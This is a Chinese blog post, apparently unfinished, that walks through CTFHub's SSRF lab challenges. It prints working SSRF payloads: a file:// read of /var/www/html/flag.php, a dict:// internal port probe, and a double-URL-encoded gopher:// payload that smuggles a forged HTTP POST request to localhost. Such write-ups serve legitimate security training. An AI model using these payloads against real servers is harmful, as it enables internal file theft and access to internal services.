CTFHub-SSRF(未完)

内网访问


本题很简单,用bs抓包,然后在url中添加 127.0.0.1/flag.php

在这里插入图片描述

伪协议读取文件

提示:尝试去读取一下Web目录下的flag.php吧

一般遇到SSRF时,先测试所有的url协议

file:///
dict://
sftp://
ldap://
tftp://
gopher://

网站的根目录一般在var/www/html

file:///var/www/html/flag.php

在这里插入图片描述

端口扫描

参考博客

提示:来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,
在这里插入图片描述
在这里插入图片描述
扫描到8385
在这里插入图片描述
成功
在这里插入图片描述
也可以通过使用SSRF中的dict协议可以用来探测开放的端口

Payload: ?url=dict://127.0.0.1:8000

POST请求

参考博客

提示:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

拿到KEY,这个题目因该就是告诉我需要给服务器发送一个KEY就能得到你想要的东西。但是页面上又什么都没有,这就需要我们构建一个POST请求包来发送这个KEY。

构造post请求:

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=a41a37cf1194ed14a5114a5565fd65ff
#注意Content-Length那里,必须和你的POST请求长度一样

编码

?url=gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0AHost:%20127.0.0.1:80%0AContent-Type:%20application/x-www-form-urlencoded%0AContent-Length:%2036%0A%0Akey=a41a37cf1194ed14a5114a5565fd65ff

然后把并把%0A替换成%0d%0A,结尾加上%0d%0A,并且末尾要加上%0d%0a(\r\n)

?url=gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0d%0AHost:%20127.0.0.1:80%0d%0AContent-Type:%20application/x-www-form-urlencoded%0d%0AContent-Length:%2036%0d%0A%0d%0Akey=a41a37cf1194ed14a5114a5565fd65ff%0d%0a

再进行一次URL编码

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=a41a37cf1194ed14a5114a5565fd65ff

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值